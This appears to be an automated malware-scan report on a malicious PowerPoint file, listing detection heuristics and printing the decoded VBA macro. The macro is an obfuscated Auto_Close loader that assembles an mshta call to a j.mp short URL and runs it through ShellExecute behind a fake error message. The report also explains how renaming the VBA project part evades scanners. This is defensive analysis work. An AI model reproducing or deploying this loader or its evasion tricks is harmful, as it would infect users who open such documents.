MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The OOXML file contains a heavily obfuscated VBA macro within the Auto_Close function. This macro constructs a URL, 'https://j.mp/adsfljsdahdvstarajraj', and uses GetObject to execute a second-stage payload via ShellExecute. The obfuscation and use of Auto_Close indicate a malicious intent to download and run arbitrary code.
Heuristics 6
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/villia.bin)
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
= _ GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen")) : MsgBox "Microsoft Office not Installed" -
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
= _ GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen")) : MsgBox "Microsoft Office not Installed" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Function _ Auto_Close _ () _
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1104 bytes |
SHA-256: e22d4007949b8c7fca2429debefc5cd675efe02bffcc321fd4911cf6a95b58e5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Function _
X _
() _
As _
String
X _
= _
"M"
End _
Function
Function _
Y _
() _
As _
String
Y _
= _
"s"
End _
Function
Function _
Z _
() _
As _
String
Z _
= _
"H"
End _
Function
Function _
D _
() _
As _
String
D _
= _
"T"
End _
Function
Function _
E _
() _
As _
String
E _
= _
"a"
End _
Function
Function _
L _
() _
As _
String
L _
= _
"p"
End _
Function
Function _
K _
() _
As _
String
K _
= _
"j.mp/"
End _
Function
Function _
T() _
As _
String
T _
= _
"adsfljsdahdvstarajraj"
End _
Function
Function _
F _
() _
As _
String
F _
= _
"H" _
+ _
D _
+ _
D _
+ _
L _
+ _
"://" _
+ _
K _
+ _
T
End _
Function
Function _
calccc _
() _
As _
String
calccc _
= _
X _
+ _
Y _
+ _
Z _
+ _
D _
+ _
E
End _
Function
Function _
Auto_Close _
() _
As _
String
Set _
alsoasld _
= _
GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
: MsgBox "Microsoft Office not Installed"
: alsoasld _
. _
shellexecute _
calccc, F
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/villia.bin | 19456 bytes |
SHA-256: ba3a4fd41266112be0b6c42b1895e6324ed73904d07bb6608a1501e95faf59fe |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.